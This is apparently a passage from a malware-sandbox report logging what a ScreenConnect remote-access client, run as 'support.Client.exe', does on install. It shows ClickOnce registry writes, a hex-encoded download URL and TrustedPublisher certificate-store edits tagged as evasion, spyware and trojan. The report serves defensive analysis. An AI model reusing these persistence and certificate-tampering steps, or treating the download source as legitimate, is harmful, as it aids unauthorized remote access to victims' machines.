Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0002_fd4f63879c71b908\pin!S_{3f471841-eef2-47d6-89c0-d028f03a4ad5} C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56d0f44e3\DigestValue = ce77b0812363223bb04bfee60d383987ca405225 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee69f377c\Files C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_24537eb26d6ad4ad\LastRunVersion = 68747470733a2f2f6465736b746f6f6c2e62757a7a2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Visibility C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\OnlineAppQuotaUsageEstimate = "3391391" C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139df4a8\lock!16000000873e5c0e38060000c00a0000000000000000000 = 30303030303633382c30316461346662353339366665623738 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0002_none_64a715acd74fe178 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key deleted \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C C:\Users\Admin\Downloads\support.Client.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579 C:\Users\Admin\Downloads\support.Client.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C C:\Users\Admin\Downloads\support.Client.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C C:\Users\Admin\Downloads\support.Client.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054 C:\Users\Admin\Downloads\support.Client.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e C:\Users\Admin\Downloads\support.Client.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579 C:\Users\Admin\Downloads\support.Client.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e C:\Users\Admin\Downloads\support.Client.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579 C:\Users\Admin\Downloads\support.Client.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054 C:\Users\Admin\Downloads\support.Client.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579 C:\Users\Admin\Downloads\support.Client.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C C:\Users\Admin\Downloads\support.Client.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
